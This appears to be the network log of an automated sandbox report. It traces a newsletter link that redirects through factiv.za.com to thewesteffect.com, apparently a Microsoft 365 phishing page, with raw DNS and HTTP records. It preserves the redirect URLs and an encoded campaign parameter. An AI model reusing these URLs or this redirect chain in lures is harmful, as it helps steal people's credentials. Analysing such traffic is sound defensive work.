                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.016532898 CET1.1.1.1192.168.2.40x47b4No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.027456045 CET1.1.1.1192.168.2.40x68afNo error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.027456045 CET1.1.1.1192.168.2.40x68afNo error (0)d2vgu95hoyrpkh.cloudfront.net13.35.58.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.027456045 CET1.1.1.1192.168.2.40x68afNo error (0)d2vgu95hoyrpkh.cloudfront.net13.35.58.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.027456045 CET1.1.1.1192.168.2.40x68afNo error (0)d2vgu95hoyrpkh.cloudfront.net13.35.58.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.027456045 CET1.1.1.1192.168.2.40x68afNo error (0)d2vgu95hoyrpkh.cloudfront.net13.35.58.71A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.189440012 CET1.1.1.1192.168.2.40x3060No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.189440012 CET1.1.1.1192.168.2.40x3060No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.734011889 CET1.1.1.1192.168.2.40xac96No error (0)thewesteffect.com192.254.232.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.485626936 CET1.1.1.1192.168.2.40x691fNo error (0)www.w3schools.comcs837.wac.edgecastcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.485626936 CET1.1.1.1192.168.2.40x691fNo error (0)cs837.wac.edgecastcdn.net192.229.133.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.487027884 CET1.1.1.1192.168.2.40x81baNo error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.487027884 CET1.1.1.1192.168.2.40x81baNo error (0)d2vgu95hoyrpkh.cloudfront.net13.35.58.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.487027884 CET1.1.1.1192.168.2.40x81baNo error (0)d2vgu95hoyrpkh.cloudfront.net13.35.58.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.487027884 CET1.1.1.1192.168.2.40x81baNo error (0)d2vgu95hoyrpkh.cloudfront.net13.35.58.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.487027884 CET1.1.1.1192.168.2.40x81baNo error (0)d2vgu95hoyrpkh.cloudfront.net13.35.58.71A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.503333092 CET1.1.1.1192.168.2.40xea36No error (0)www.w3schools.comcs837.wac.edgecastcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.526674986 CET1.1.1.1192.168.2.40x36eNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.526674986 CET1.1.1.1192.168.2.40x36eNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.527914047 CET1.1.1.1192.168.2.40x3a82No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.527914047 CET1.1.1.1192.168.2.40x3a82No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.535093069 CET1.1.1.1192.168.2.40xceaNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.535093069 CET1.1.1.1192.168.2.40xceaNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.535093069 CET1.1.1.1192.168.2.40xceaNo error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.536809921 CET1.1.1.1192.168.2.40x20d3No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.536809921 CET1.1.1.1192.168.2.40x20d3No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.546648979 CET1.1.1.1192.168.2.40xce7No error (0)cdn.socket.iod2vgu95hoyrpkh.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.414350986 CET1.1.1.1192.168.2.40x72cbNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.414350986 CET1.1.1.1192.168.2.40x72cbNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.515218019 CET1.1.1.1192.168.2.40x61d1No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.515218019 CET1.1.1.1192.168.2.40x61d1No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.648329020 CET1.1.1.1192.168.2.40x8208No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.648329020 CET1.1.1.1192.168.2.40x8208No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.648329020 CET1.1.1.1192.168.2.40x8208No error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.649312973 CET1.1.1.1192.168.2.40xd6beNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:46.649312973 CET1.1.1.1192.168.2.40xd6beNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:47.957015991 CET1.1.1.1192.168.2.40xc302No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:47.957015991 CET1.1.1.1192.168.2.40xc302No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:01.693216085 CET1.1.1.1192.168.2.40xf891No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:01.693216085 CET1.1.1.1192.168.2.40xf891No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:25.703036070 CET1.1.1.1192.168.2.40x6059No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:25.703036070 CET1.1.1.1192.168.2.40x6059No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.528961897 CET1.1.1.1192.168.2.40xa3c7No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            Nov 14, 2024 13:02:48.528961897 CET1.1.1.1192.168.2.40xa3c7No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                            • link.mail.beehiiv.com
                                                                                                                                                                                                                                            • factiv.za.com
                                                                                                                                                                                                                                            • fs.microsoft.com
                                                                                                                                                                                                                                            • thewesteffect.com
                                                                                                                                                                                                                                            • https:
                                                                                                                                                                                                                                              • cdn.socket.io
                                                                                                                                                                                                                                              • aadcdn.msauth.net
                                                                                                                                                                                                                                              • logincdn.msauth.net
                                                                                                                                                                                                                                              • www.w3schools.com
                                                                                                                                                                                                                                              • aadcdn.msftauth.net
                                                                                                                                                                                                                                            • otelrules.azureedge.net
                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            0192.168.2.449740104.18.68.40443984C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:01:37 UTC1471OUTGET /ls/click?upn=u001.Gum4XCDwDfMXb6rJ3y3QBdDxM7nMOkZPDYDs-2Fn4WmtuPspPs1QqGUSOcILP8eRDkf7FonibETXe6kfp9hZMBuLLIsWyLPqBX3fqv7wiz-2BVqhEikbp2E-2FHaXJRKo48fhFNNEtQg6epBRi-2BMdKBZw5upKI6jE-2BR4F9nThzpezwBtIq3xsnOhp1jv8evTBHOgOEJSUeA-2FF-2FHmj6CIJtpbnsGltReMlyxyPflrIWboJRaiwxHQKDD305BUmDBr0XfHWdzbSVZPG5s5Q5aDjslzgXQGVQiRAf-2F6baexJshppt13Q-3DyLvz_pVu-2Bme9mTwi8mVEI1fxkMxbIV0ignfjjqHxVxnx9LwJUWDBaY-2FzFT-2Fe44lxkpYHb0-2FiAIIT14KZxdnbgbo-2FBfXfgOI1Vb7dplYipJDknsAMDy6MirKMWJLgumGepN8N7Uy1vPvXIxmVYzQwNevQkY3yvRn762WvkrylkaRmnJXdcg9gL1zTVX5xx5qzRUtQ6e2JnpmrvGdZE-2BqNgLcQSVtnYKBGJGbo6m5lVbS8xxx7Ce6bGKqhllcz70sWr2hVP0fneTC0f5OmbCb1DEm2YXSXocIpmaeUDoG81RQhJo6PidbFG5P4Q05aEHhakAksKcNgcbk3wu16DUAfmjwXongASSgb2kSoPL-2FnjY0fXfPdf-2BJ5NWTE67A1Gxo4YYWT10KmEmGM38HjvJsvPz2WP-2Boa4OTENwch6qtrd8GRGJ2maI9xfnFjyKX5sy59jEQeq HTTP/1.1
                                                                                                                                                                                                                                            Host: link.mail.beehiiv.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                            Sec-Fetch-User: ?1
                                                                                                                                                                                                                                            Sec-Fetch-Dest: document
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2024-11-14 12:01:38 UTC736INHTTP/1.1 302 Found
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:01:38 GMT
                                                                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Location: https://factiv.za.com?utm_source=jeffs-newsletter-b696b2.beehiiv.com&utm_medium=newsletter&utm_campaign=a-new-chapter-in-qin-qio-healthcare-initiatives&_bhlid=d0004fb3ceb6d2f6e26427e761e06be86ee52a61
                                                                                                                                                                                                                                            X-Robots-Tag: noindex, nofollow
                                                                                                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                            Set-Cookie: __cf_bm=2uA4jEQ7ml3a2_ka8hth390ZZZuNAWVzxuzTQ0V9YO8-1731585698-1.0.1.1-P30aVfyWQXZCTq7KMHoVQlzn5mOAFWtHQMqTP9GgFhHG.q29nYueUsrfyxPIsQpYsm3QXgDNFeKegvVfvDY3vQ; path=/; expires=Thu, 14-Nov-24 12:31:38 GMT; domain=.beehiiv.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                            CF-RAY: 8e26d9147d576be9-DFW
                                                                                                                                                                                                                                            2024-11-14 12:01:38 UTC240INData Raw: 65 61 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 61 63 74 69 76 2e 7a 61 2e 63 6f 6d 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 6a 65 66 66 73 2d 6e 65 77 73 6c 65 74 74 65 72 2d 62 36 39 36 62 32 2e 62 65 65 68 69 69 76 2e 63 6f 6d 26 61 6d 70 3b 75 74 6d 5f 6d 65 64 69 75 6d 3d 6e 65 77 73 6c 65 74 74 65 72 26 61 6d 70 3b 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 61 2d 6e 65 77 2d 63 68 61 70 74 65 72 2d 69 6e 2d 71 69 6e 2d 71 69 6f 2d 68 65 61 6c 74 68 63 61 72 65 2d 69 6e 69 74 69 61 74 69 76 65 73 26 61 6d 70 3b 5f 62 68 6c 69 64 3d 64 30 30 30 34 66 62 33 63 65 62 36 64 32 66 36 65 32 36 34 32 37 65 37 36 31 65 30 36 62 65 38 36 65 65 35 32 61 36 31 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: ea<a href="https://factiv.za.com?utm_source=jeffs-newsletter-b696b2.beehiiv.com&amp;utm_medium=newsletter&amp;utm_campaign=a-new-chapter-in-qin-qio-healthcare-initiatives&amp;_bhlid=d0004fb3ceb6d2f6e26427e761e06be86ee52a61">Found</a>.
                                                                                                                                                                                                                                            2024-11-14 12:01:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            1192.168.2.449742184.28.90.27443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:01:39 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                            User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                            Host: fs.microsoft.com
                                                                                                                                                                                                                                            2024-11-14 12:01:39 UTC466INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                            Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                                            X-CID: 11
                                                                                                                                                                                                                                            X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                            X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                            Cache-Control: public, max-age=26004
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:01:39 GMT
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            X-CID: 2


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            2192.168.2.449743185.221.216.128443984C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:01:39 UTC834OUTGET /?utm_source=jeffs-newsletter-b696b2.beehiiv.com&utm_medium=newsletter&utm_campaign=a-new-chapter-in-qin-qio-healthcare-initiatives&_bhlid=d0004fb3ceb6d2f6e26427e761e06be86ee52a61 HTTP/1.1
                                                                                                                                                                                                                                            Host: factiv.za.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                            Sec-Fetch-User: ?1
                                                                                                                                                                                                                                            Sec-Fetch-Dest: document
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2024-11-14 12:01:39 UTC291INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:01:39 GMT
                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                            Location: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVUwNUhaWGc9JnVpZD1VU0VSMTExMTIwMjRVMzUxMTExNDQ=N0123N
                                                                                                                                                                                                                                            Content-Length: 315
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                            2024-11-14 12:01:39 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 77 65 73 74 65 66 66 65 63 74 2e 63 6f 6d 2f 6e 2f 3f 63 33 59 39 62 7a 4d 32 4e 56 38 78 58 32 35 76 62 53 5a 79 59 57 35 6b 50 56 55 77 4e 55 68 61 57 47 63 39 4a 6e 56 70 5a 44 31 56 55 30 56 53 4d
                                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVUwNUhaWGc9JnVpZD1VU0VSM


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            3192.168.2.449744184.28.90.27443
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:01:40 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                            If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                            Range: bytes=0-2147483646
                                                                                                                                                                                                                                            User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                            Host: fs.microsoft.com
                                                                                                                                                                                                                                            2024-11-14 12:01:40 UTC514INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            ApiVersion: Distribute 1.1
                                                                                                                                                                                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                            Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                                            X-CID: 11
                                                                                                                                                                                                                                            X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                            X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                            Cache-Control: public, max-age=25930
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:01:40 GMT
                                                                                                                                                                                                                                            Content-Length: 55
                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                            X-CID: 2
                                                                                                                                                                                                                                            2024-11-14 12:01:40 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                            Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            4192.168.2.449745192.254.232.133443984C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:01:40 UTC741OUTGET /n/?c3Y9bzM2NV8xX25vbSZyYW5kPVUwNUhaWGc9JnVpZD1VU0VSMTExMTIwMjRVMzUxMTExNDQ=N0123N HTTP/1.1
                                                                                                                                                                                                                                            Host: thewesteffect.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                            Sec-Fetch-User: ?1
                                                                                                                                                                                                                                            Sec-Fetch-Dest: document
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                            2024-11-14 12:01:41 UTC208INHTTP/1.1 200 OK
                                                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 12:01:40 GMT
                                                                                                                                                                                                                                            Server: Apache
                                                                                                                                                                                                                                            Upgrade: h2,h2c
                                                                                                                                                                                                                                            Connection: Upgrade, close
                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                            2024-11-14 12:01:41 UTC4726INData Raw: 31 32 36 39 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 59 6f 75 20 6e 65 65 64 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 20 74 6f 20 72 75 6e 20 74 68 69 73 20 61 70 70 2e 3c 2f 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 72 6f
                                                                                                                                                                                                                                            Data Ascii: 1269<!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> </head> <body> <noscript>You need to enable JavaScript to run this app.</noscript> <div id="ro


                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                            5192.168.2.449746192.254.232.133443984C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                            2024-11-14 12:01:41 UTC981OUTPOST /n/?c3Y9bzM2NV8xX25vbSZyYW5kPVUwNUhaWGc9JnVpZD1VU0VSMTExMTIwMjRVMzUxMTExNDQ=N0123N HTTP/1.1
                                                                                                                                                                                                                                            Host: thewesteffect.com
                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                            Content-Length: 139036
                                                                                                                                                                                                                                            Cache-Control: max-age=0
                                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                            Origin: https://thewesteffect.com
                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                            Sec-Fetch-Dest: document
                                                                                                                                                                                                                                            Referer: https://thewesteffect.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPVUwNUhaWGc9JnVpZD1VU0VSMTExMTIwMjRVMzUxMTExNDQ=N0123N
                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
